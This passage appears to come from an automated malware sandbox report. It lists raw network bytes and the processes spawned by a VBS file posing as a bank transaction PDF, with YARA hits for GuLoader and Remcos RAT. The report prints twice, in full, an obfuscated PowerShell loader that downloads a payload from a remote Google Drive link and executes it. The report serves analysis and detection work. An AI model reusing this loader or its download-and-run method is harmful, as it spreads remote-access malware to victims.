2024-09-09 06:55:37 UTC	1390	IN	Data Raw: 2e c0 58 cd b9 24 6f 6b 15 ff c7 a8 4e 19 2b 36 4f 4e 2b 87 5e 8f 80 c4 93 99 4c d8 b9 33 8e bf fc 36 2b 11 cf fd 29 06 2b f2 07 70 58 6f c1 a3 34 c3 67 92 cd 2e 33 0d f2 74 e1 43 a1 87 0b a4 bb b4 ad 62 50 d9 eb 7c 7b 8f 12 02 0c b2 b8 c7 4b fd ed 73 a0 49 92 05 ad 40 11 9f 47 28 46 b0 e3 89 97 8d 99 e1 85 94 9b c8 68 48 ee a5 b2 63 b1 fc 76 06 6f bb 0d 16 37 9b c2 72 ab d0 cf 9f 82 7c d6 43 b3 b1 07 a3 33 5f 8f 85 6f fb a0 2f b3 0d a7 4a de 38 ee cb 7b 2f c4 b2 65 2d 19 03 3d 56 34 4a 7c be d5 25 3e f2 f1 0d 1e e0 b7 75 7f 81 af 0d d3 52 1e 1a 31 15 ad fd be 87 88 cb ac 9f 90 0a a1 43 38 55 0a 36 6d 79 c7 89 e9 5d fd ed f9 72 6a c3 aa 41 cb b1 a3 9b 5c 70 a1 a8 7a 45 15 49 28 bc d3 fc cc a8 fa f5 3e 4a 70 1c ca 82 fc 83 db 6b d3 16 9b 3a 34 5e ac c3 8a Data Ascii: .X$okN+6ON+^L36+)+pXo4g.3tCbP\|{KsI@G(FhHcvo7r\|C3_o/J8{/e-=V4J\|%>uR1C8U6my]rjA\pzEI(>Jpk:4^
2024-09-09 06:55:37 UTC	1390	IN	Data Raw: 84 c5 0b f6 08 22 76 c2 4c 07 8c 69 5a e4 2e 1b 0c f0 77 df 30 5c 70 42 91 e8 8d df 7b 9f 2e 48 4f b3 67 58 31 6a 69 b2 74 ff 55 3f 98 76 57 b6 56 a3 af a1 1b 0e 82 f5 c6 c3 cd b7 b7 e1 e4 bd 55 cc 91 28 ab ce 0d 05 44 52 01 13 70 cb d9 e3 9a ad 9a 92 72 0c e5 76 66 b3 91 d5 f7 8b ad 7d fb e4 b7 40 8c 6e c1 c2 f8 6d b0 f8 2a cb 74 ab fc eb 8f 86 c3 28 cb ad a1 47 ed ec 75 d2 98 49 e5 9d 23 6b f2 3c 04 94 ee 88 86 88 43 e3 cf 62 b0 21 52 84 d9 11 e8 be 5e 5f cb 38 9a 0d 31 50 41 5e ed d6 b3 54 e8 ad 91 6f 9d a1 59 f0 e6 a7 6d ef 16 e2 e7 c0 c1 28 8c 56 6a 41 38 ad d5 76 a3 71 1a 36 42 7b c7 cc ec 7e c5 5d 30 5b 2e 16 19 8a 47 e2 13 0c 38 c4 a5 fa 26 3c b4 f4 fb 9a 00 0c e1 c9 59 5d bb e5 a4 74 08 24 11 33 29 2d d7 93 55 f3 53 8c 89 4b 42 4c 57 b7 44 4f 19 Data Ascii: "vLiZ.w0\pB{.HOgX1jitU?vWVU(DRprvf}@nm*t(GuI#k<Cb!R^_81PA^ToYm(VjA8vq6B{~]0[.G8&<Y]t$3)-USKBLWDO
2024-09-09 06:55:37 UTC	1390	IN	Data Raw: f9 27 87 2f 69 5e 88 87 be 46 e7 d9 37 53 d9 1d 5e 4e 18 23 c0 3d 02 d4 b8 6b ac 44 27 45 f1 e7 9e 2a b7 89 6b 61 c1 33 24 f9 de 0f e6 08 a0 21 dd e4 02 4c 3e 07 2a d2 fb 3b 90 77 15 29 76 e6 4d 05 bd 27 c2 de 68 b5 90 40 d8 b0 46 55 63 99 ad c9 56 e4 73 ae d9 41 33 79 02 54 dc ff b1 43 75 bb 0c 50 af bd 78 01 cf 71 6b 0c de 65 80 ca ff e4 fd 2e de 42 da 16 91 de ea 6b 1c e3 dc 3e fc 17 1e 13 20 94 e1 64 61 42 4c 8a 70 ae bf ca f0 df 22 88 53 0b 1d 07 dd 2a 27 45 9b 12 7b 9d e0 0a 46 65 1c c4 42 67 7f 7d 65 f4 d7 3f 73 72 19 c3 bc 02 15 f4 a5 f3 a1 7f bc 5f e0 79 a1 7c 4a 54 51 22 f4 4b 80 dc 88 41 7f 2a a7 e4 6c 90 86 05 28 43 59 3a 27 38 21 65 17 ae 6f 1d 1d fb 8a 78 9f f3 e9 b8 9f 05 ae 1a f6 08 4d f9 82 09 6f 79 21 48 53 69 6e 19 5e d3 9a 50 43 b5 6b Data Ascii: '/i^F7S^N#=kD'Eka3$!L>;w)vM'h@FUcVsA3yTCuPxqke.Bk> daBLp"S'E{FeBg}e?sr_y\|JTQ"KAl(CY:'8!eoxMoy!HSin^PCk

Target ID:	0
Start time:	02:55:00
Start date:	09/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs"
Imagebase:	0x7ff6b4270000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:55:03
Start date:	09/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:55:03
Start date:	09/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:55:05
Start date:	09/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
Imagebase:	0x7ff6fe320000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:55:14
Start date:	09/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
Imagebase:	0xbb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1633262835.0000000009630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.1634165473.000000000C6E5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:55:15
Start date:	09/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:09:03
Start date:	09/09/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x6c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:09:14
Start date:	09/09/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x6c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:09:15
